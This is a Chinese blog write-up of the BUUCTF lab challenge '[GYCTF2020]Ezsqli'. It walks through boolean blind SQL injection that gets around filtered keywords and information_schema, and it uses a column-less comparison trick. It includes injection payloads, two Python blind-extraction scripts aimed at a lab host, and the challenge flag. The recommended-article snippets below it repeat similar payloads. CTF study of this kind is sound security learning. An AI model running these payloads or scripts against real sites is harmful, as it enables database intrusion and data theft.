[GYCTF2020]Ezsqli

最新推荐文章于 2024-03-22 07:00:00 发布
最新推荐文章于 2024-03-22 07:00:00 发布
阅读量282 收藏 1
点赞数
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/115206265
版权

访问页面,大孝子的微笑让我只能暗自庆幸现在是公司的午休时间;
我果断抓包测试,不能在原页面上测;

输入框填个1,返回了Nu1L
Nu1L
输入1',返回bool(false)
bool(flase)
这可是一个关键信息,可能是布尔盲注;

fuzz一下,过滤的应该是符号+关键字+符号
所以or会被过滤, 直接用||代替就好了;
试试布尔注入;

-1||length(database())>1

则返回结果为true,输出结果为Nu1L
当返回结果为false,输出结果为Error Occured When Fetch Result.

可以测试;

-1||(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>1)

结果被过滤了;
过滤了
检查了一下,应该是information_shcema被过滤了;
这里有个知识点,可以用sys_schema_table_statistics表来获取数据;
构造payload:

 -1||(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics where table_schema=database()),1,1))>1)

测试后,返回Nu1L
在这里插入图片描述
写个脚本;

import requests
import time

flag = ""
for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        url = 'http://8206b8e3-de88-4cf4-9a01-f612c6f9a762.node3.buuoj.cn/index.php'
        payload = {
            "id":'-1||(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics where table_schema=database()),{0},1))>{1})'.format(i,mid)
        }
        res = requests.post(url, payload)

        if 'Nu1L' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
        time.sleep(0.1)
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)

跑出了两个表,users233333333333333f1ag_1s_h3r3_hhhhh
后续要如何替代information_schema来获取列名呢?
这里用无列名注入
用以下例子来理解这个方法的原理;
在这里插入图片描述
在对字符串进行比较的时候,由于单词的首字母k>j(ascii),所以返回的结果为1
在不知道列名的情况下,通过填充我们的比对字符串,来匹配表中的value的每一个字符,从而得到value的值;
为了更好的理解,我创建了一个表;
在这里插入图片描述
已知f的ascii码为102
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210326104901465.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0sxb3Nl,size_16,color_FFFFFF,t
再来看看这个;
在这里插入图片描述
不难看出,第一个字符到最后一个字符遍历比对;
这样,我们可以把每次比对完成的字符一次次拼接,进入循环再次比对;
给大伙看看我的笨批jio本,用的二分法;

import requests
import time

flag = ""
myflag = ""
for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) // 2
    flag = myflag
    while low < high:
        flag = flag + chr(mid)
        url = 'http://8206b8e3-de88-4cf4-9a01-f612c6f9a762.node3.buuoj.cn/index.php'
        payload = {
            "id": '-1||((select 1,"{0}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(flag)
        }
        res = requests.post(url, payload)

        if 'Nu1L' in res.text:
            high = mid
        else:
            low = mid + 1
        flag = myflag + ''
        mid = (low + high) // 2
        time.sleep(0.1)
    if (mid == 32 or mid == 127):
        break
    myflag = myflag + chr(mid - 1)
    print(myflag)

跑完了发现忘记写比较完成相同的情况了233,跑个不停,这个我就懒得再写了;
满眼flag,太幸福了;
在这里插入图片描述
另外我直接交上去大写的flag,结果错了,换成小写交上去就对了;
用大写的原因估计是方便暴力跑出来的脚本,因为大写字母ASCII码相较之下靠前一些;
FLAG{34B5DC73-6FAC-4AD8-B504-713A306B319A}
flag{34b5dc73-6fac-4ad8-b504-713a306b319a}

K1ose
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PHP登录环节防止sql注入的方法浅析
10-25
在登录环节,SQL注入攻击尤其危险,攻击者通过注入恶意SQL代码,可能绕过身份验证,获取数据库敏感信息,甚至对数据库进行破坏。 ...如果攻击者注入的是"***" union select * from users/*",那么利用union联合查询,...
(四)[GYCTF2020]Ezsqli(bool 盲注,无列名注入)
qq_53856457的博客
11-25 684
打开,经典查询框,先随意提交1,post数据,抓包看一下 burp fuzz测试一下,可以看到常用的information,information_schema,or,union等关键字被过滤了,简单尝试后,发现没有回显,也没有报错,当语句为真时返回Nu1L,为假时返回V&N,考虑布尔盲注。 注:补充!!! InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_tabl
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 554
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
[GYCTF2020]Ezsqli ---不会编程的崽
最新发布
不会编程的崽的博客
03-22 476
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
m0_62094846的博客
05-18 636
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
[GYCTF2020]Ezsqli 绕过or information_schema 无列名注入
m0_64180167的博客
10-09 502
说好的ez....我们开始吧首先就直接进行抓包 看回显然后开始正常的测试报错了 这里的。
[GYCTF2020]Ezsqli --BUUCTF
金 帛的博客
06-12 760
BUUCTF记录贴
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 5204
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 408
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1427
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值